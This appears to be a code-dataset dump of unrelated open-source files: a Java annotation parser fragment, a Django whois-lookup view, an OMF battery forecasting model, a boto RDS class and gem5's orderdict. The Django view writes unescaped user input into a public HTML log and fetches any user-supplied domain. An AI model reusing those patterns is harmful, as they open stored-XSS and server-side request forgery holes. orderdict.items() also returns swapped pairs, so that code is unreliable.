self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.DOUBLE])
elif tag == 'F':
self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.FLOAT])
elif tag == 'I':
self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.INTEGER])
elif tag == 'J':
self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.LONG])
elif tag == 'S':
self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.INTEGER])
elif tag == 'Z':
self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.INTEGER])
elif tag == 's':
self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.UTF8])
elif tag == 'e':
self._type_name_index, = self.read_data('>H')
self.length += 2
self.type_name = self.constant_pool.ref(self._type_name_index, [ConstantType.UTF8])
self._const_name_index, = self.read_data('>H')
self.length += 2
self.const_name = self.constant_pool.ref(self._const_name_index, [ConstantType.UTF8])
self.value = (self.type_name, self.const_name)
elif tag == 'c':
self._value_index, = self.read_data('>H')
self.length += 2
self.value = self.constant_pool.ref(self._value_index, [ConstantType.UTF8])
elif tag == '@':
annotation = _Annotation(self)
self.value = annotation
self.length += annotation.length
elif tag == '[':
num_value, = self.read_data('>H')
self.length += 2
self.value = []
for _ in range(num_value):
element = _ElementValue(self)
self.length += element.length
self.value.append(element)
else:
raise AnnotationError('Unknown annotation element tag: %c' % tag)
def __str__(self):
return '%c(%s)' % (self.tag, self.value)
| mit |
josiasjuniorx/consulta-dominio | dominio/views.py | 1 | 1320 | from .whois import *
import verifica_site
from django.shortcuts import render
import os
import logging
from django.http import HttpResponse, HttpRequest, HttpResponseRedirect
from django.urls import reverse
logger = logging.getLogger("CONSULTAS")
logger.setLevel(logging.INFO)
handler = logging.FileHandler('static/logs.html')
formatter = logging.Formatter(\
'<center><table style="border:1px;border-style:solid;\
width:900px;color:blue;border-color:black;font-size:12px">\
<tr><td>%(asctime)s [UTC] - %(message)s</td></tr>',
datefmt='%d/%b/%Y %H:%M:%S'\
)
handler.setFormatter(formatter)
logger.addHandler(handler)
def index(request):
if not request.method == 'POST':
return render(request, 'dominio/index.html')
dominio = request.POST['dominio']
dominio = clean_dominio(dominio)
cliente = request.META.get('REMOTE_ADDR')
nserver = request.POST['nserver']
whois = consulta_whois(dominio)
enderecos = consulta_host(dominio, nserver)
logger.info('[ %s ] consultou o dominio ( %s )', cliente, dominio)
return render(request, 'dominio/index.html', {
'dominio': dominio,
'enderecos': enderecos,
'whois': whois
})
def site(request):
dominio = request.GET['dominio']
return HttpResponse(verifica_site.requisicao(dominio))
| gpl-3.0 |
dpinney/omf | omf/scratch/Neural_Net_Experimentation/deleted models/forecastStoragePeakShave.py | 1 | 7466 | ''' Apply PNNL VirtualBatteries (VBAT) load model to day ahead forecast.'''
import pandas as pd
import numpy as np
from sklearn import linear_model
import pulp
from os.path import isdir, join as pJoin
import __neoMetaModel__
from __neoMetaModel__ import *
from omf import forecast as fc
# Model metadata:
modelName, template = metadata(__file__)
tooltip = ('Calculate the virtual battery capacity for a collection of '
'thermostically controlled loads with day-ahead forecasting.')
hidden = True
def work(modelDir, ind):
#print(ind)
''' Run the model in its directory.'''
# drop inverter efficiency
# drop DoD
(cellCapacity, dischargeRate, chargeRate, cellQuantity, cellCost) = \
[float(ind[x]) for x in ('cellCapacity', 'dischargeRate', 'chargeRate', 'cellQuantity', 'cellCost')]
battEff = float(ind.get("batteryEfficiency")) / 100.0
dodFactor = float(ind.get('dodFactor')) / 100.0
projYears = int(ind.get('projYears'))
batteryCycleLife = int(ind.get('batteryCycleLife'))
o = {}
try:
with open(pJoin(modelDir, 'hist.csv'), 'w') as f:
f.write(ind['historicalData'].replace('\r', ''))
df = pd.read_csv(pJoin(modelDir, 'hist.csv'), parse_dates=['dates'])
df['month'] = df['dates'].dt.month
df['dayOfYear'] = df['dates'].dt.dayofyear
assert df.shape[0] >= 26280 # must be longer than 3 years
assert df.shape[1] == 5
except:
raise Exception("CSV file is incorrect format.")
# retrieve goal
goal = ind['goal']
threshold = float(ind['transformerThreshold'])*1000
confidence = float(ind['confidence'])/100
# train model on previous data
all_X = fc.makeUsefulDf(df)
all_y = df['load']
X_train, y_train = all_X[:-8760], all_y[:-8760]
clf = linear_model.SGDRegressor(max_iter=10000, tol=1e-4)
clf.fit(X_train, y_train)
# ---------------------- MAKE PREDICTIONS ------------------------------- #
X_test, y_test = all_X[-8760:], all_y[-8760:]
# Collect data necessary for dispatch calculations
predictions = clf.predict(X_test)
dailyLoadPredictions = [predictions[i:i+24] for i in range(0, len(predictions), 24)]
weather = df['tempc'][-8760:]
dailyWeatherPredictions = [weather[i:i+24] for i in range(0, len(weather), 24)]
month = df['month'][-8760:]
dispatched = [False]*365
# decide to implement VBAT every day for a year
VB_power, VB_energy = [], []
for i, (load24, temp24, m) in enumerate(zip(dailyLoadPredictions, dailyWeatherPredictions, month)):
peak = max(load24)
if fc.shouldDispatchPS(peak, m, df, confidence):
dispatched[i] = True
vbp, vbe = fc.pulp24hrBattery(load24, dischargeRate*cellQuantity,
cellCapacity*cellQuantity, battEff)
VB_power.extend(vbp)
VB_energy.extend(vbe)
else:
VB_power.extend([0]*24)
VB_energy.extend([0]*24)
# -------------------- MODEL ACCURACY ANALYSIS -------------------------- #
o['predictedLoad'] = list(clf.predict(X_test))
o['trainAccuracy'] = round(clf.score(X_train, y_train) * 100, 2)
o['testAccuracy'] = round(clf.score(X_test, y_test) * 100, 2)
# PRECISION AND RECALL
maxDays = []
for month in range(1, 13):
test = df[df['month'] == month]
maxDays.append(test.loc[test['load'].idxmax()]['dayOfYear'])
shouldHaveDispatched = [False]*365
for day in maxDays:
shouldHaveDispatched[day] = True
truePositive = len([b for b in [i and j for (i, j) in zip(dispatched, shouldHaveDispatched)] if b])
falsePositive = len([b for b in [i and (not j) for (i, j) in zip(dispatched, shouldHaveDispatched)] if b])
falseNegative = len([b for b in [(not i) and j for (i, j) in zip(dispatched, shouldHaveDispatched)] if b])
o['precision'] = round(truePositive / float(truePositive + falsePositive) * 100, 2)
o['recall'] = round(truePositive / float(truePositive + falseNegative) * 100, 2)
o['number_of_dispatches'] = len([i for i in dispatched if i])
o['MAE'] = round(sum([abs(l-m)/m*100 for l, m in zip(predictions, list(y_test))])/8760., 2)
# ---------------------- FINANCIAL ANALYSIS ----------------------------- #
o['VBpower'], o['VBenergy'] = list(VB_power), list(VB_energy)
# Calculate monthHours
year = df[-8760:].copy()
year.reset_index(inplace=True)
year['hour'] = list(year.index)
start = list(year.groupby('month').first()['hour'])
finish = list(year.groupby('month').last()['hour'])
monthHours = [(s, f+1) for (s, f) in zip(start, finish)]
demand = list(y_test)
peakDemand = [max(demand[s:f]) for s, f in monthHours]
energyMonthly = [sum(demand[s:f]) for s, f in monthHours]
demandAdj = [d+p for d, p in zip(demand, o['VBpower'])]
peakAdjustedDemand = [max(demandAdj[s:f]) for s, f in monthHours]
energyAdjustedMonthly = [sum(demandAdj[s:f]) for s, f in monthHours]
o['demand'] = demand
o['peakDemand'] = peakDemand
o['energyMonthly'] = energyMonthly
o['demandAdjusted'] = demandAdj
o['peakAdjustedDemand'] = peakAdjustedDemand
o['energyAdjustedMonthly'] = energyAdjustedMonthly
initInvestment = cellCost*cellQuantity
eCost = float(ind['electricityCost'])
dCharge = float(ind['demandChargeCost'])
o['VBdispatch'] = [dal-d for dal, d in zip(demandAdj, demand)]
o['energyCost'] = [em*eCost for em in energyMonthly]
o['energyCostAdjusted'] = [eam*eCost for eam in energyAdjustedMonthly]
o['demandCharge'] = [peak*dCharge for peak in peakDemand]
o['demandChargeAdjusted'] = [pad*dCharge for pad in o['peakAdjustedDemand']]
o['totalCost'] = [ec+dcm for ec, dcm in zip(o['energyCost'], o['demandCharge'])]
o['totalCostAdjusted'] = [eca+dca for eca, dca in zip(o['energyCostAdjusted'], o['demandChargeAdjusted'])]
o['savings'] = [tot-tota for tot, tota in zip(o['totalCost'], o['totalCostAdjusted'])]
annualEarnings = sum(o['savings']) # - something!
cashFlowList = [annualEarnings] * int(ind['projectionLength'])
cashFlowList.insert(0, -1*initInvestment)
o['NPV'] = np.npv(float(ind['discountRate'])/100, cashFlowList)
o['SPP'] = initInvestment / annualEarnings
o['netCashflow'] = cashFlowList
o['cumulativeCashflow'] = [sum(cashFlowList[:i+1]) for i, d in enumerate(cashFlowList)]
o['dataCheck'] = 'Threshold exceeded' if any([threshold > i for i in demandAdj]) and goal == 'deferral' else ''
o['transformerThreshold'] = threshold if goal == 'deferral' else None
o['stdout'] = 'Success'
return o
def new(modelDir):
''' Create a new instance of this model. Returns true on success, false on failure. '''
defaultInputs = {
"modelType": modelName,
"user": "admin",
"goal": "peakShave",
"confidence": "80",
"demandChargeCost":"25",
"electricityCost":"0.06",
"projectionLength":"15",
"discountRate":"2",
"historicalData": open(pJoin(__neoMetaModel__._omfDir,"static","testFiles","Texas_17yr_TempAndLoad.csv")).read(),
"filename": "Texas_17yr_TempAndLoad.csv",
"transformerThreshold": "20",
"batteryEfficiency": "92",
"inverterEfficiency": "97.5",
"cellCapacity": "7",
"dischargeRate": "5",
"chargeRate": "5",
"cellCost": "7140",
"cellQuantity": "25",
"projYears": "15",
"chargePriceThreshold": "0.07",
"dischargePriceThreshold":"0.15",
"dodFactor":"100",
"batteryCycleLife": "5000"
}
creationCode = __neoMetaModel__.new(modelDir, defaultInputs)
return creationCode
def _tests():
modelLoc = pJoin(__neoMetaModel__._omfDir,'data','Model','admin','Automated Testing of ' + modelName)
if isdir(modelLoc):
shutil.rmtree(modelLoc)
new(modelLoc) # Create New.
renderAndShow(modelLoc) # Pre-run.
runForeground(modelLoc) # Run the model.
renderAndShow(modelLoc) # Show the output.
if __name__ == '__main__':
_tests()
| gpl-2.0 |
GitHublong/hue | desktop/core/ext-py/boto-2.38.0/boto/rds/vpcsecuritygroupmembership.py | 177 | 3131 | # Copyright (c) 2013 Anthony Tonns http://www.corsis.com/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents a VPCSecurityGroupMembership
"""
class VPCSecurityGroupMembership(object):
"""
Represents VPC Security Group that this RDS database is a member of
Properties reference available from the AWS documentation at
http://docs.aws.amazon.com/AmazonRDS/latest/APIReference/\
API_VpcSecurityGroupMembership.html
Example::
pri = "sg-abcdefgh"
sec = "sg-hgfedcba"
# Create with list of str
db = c.create_dbinstance(... vpc_security_groups=[pri], ... )
# Modify with list of str
db.modify(... vpc_security_groups=[pri,sec], ... )
# Create with objects
memberships = []
membership = VPCSecurityGroupMembership()
membership.vpc_group = pri
memberships.append(membership)
db = c.create_dbinstance(... vpc_security_groups=memberships, ... )
# Modify with objects
memberships = d.vpc_security_groups
membership = VPCSecurityGroupMembership()
membership.vpc_group = sec
memberships.append(membership)
db.modify(... vpc_security_groups=memberships, ... )
:ivar connection: :py:class:`boto.rds.RDSConnection` associated with the
current object
:ivar vpc_group: This id of the VPC security group
:ivar status: Status of the VPC security group membership
<boto.ec2.securitygroup.SecurityGroup>` objects that this RDS Instance
is a member of
"""
def __init__(self, connection=None, status=None, vpc_group=None):
self.connection = connection
self.status = status
self.vpc_group = vpc_group
def __repr__(self):
return 'VPCSecurityGroupMembership:%s' % self.vpc_group
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'VpcSecurityGroupId':
self.vpc_group = value
elif name == 'Status':
self.status = value
else:
setattr(self, name, value)
| apache-2.0 |
Menooker/gem5_pcm | src/python/m5/util/orderdict.py | 88 | 2718 | # Copyright (c) 2005 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Nathan Binkert
__all__ = [ 'orderdict' ]
from UserDict import DictMixin
class orderdict(dict, DictMixin):
def __init__(self, *args, **kwargs):
if len(args) > 1:
raise TypeError("expected at most one argument, got %d" % \
len(args))
self._keys = []
self.update(*args, **kwargs)
def __setitem__(self, key, item):
if key not in self:
self._keys.append(key)
super(orderdict, self).__setitem__(key, item)
def __delitem__(self, key):
super(orderdict, self).__delitem__(key)
self._keys.remove(key)
def clear(self):
super(orderdict, self).clear()
self._keys = []
def iterkeys(self):
for key in self._keys:
yield key
def itervalues(self):
for key in self._keys:
yield self[key]
def iteritems(self):
for key in self._keys:
yield key, self[key]
def keys(self):
return self._keys[:]
def values(self):
return [ self[key] for key in self._keys ]
def items(self):
return [ (self[key],key) for key in self._keys ]
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.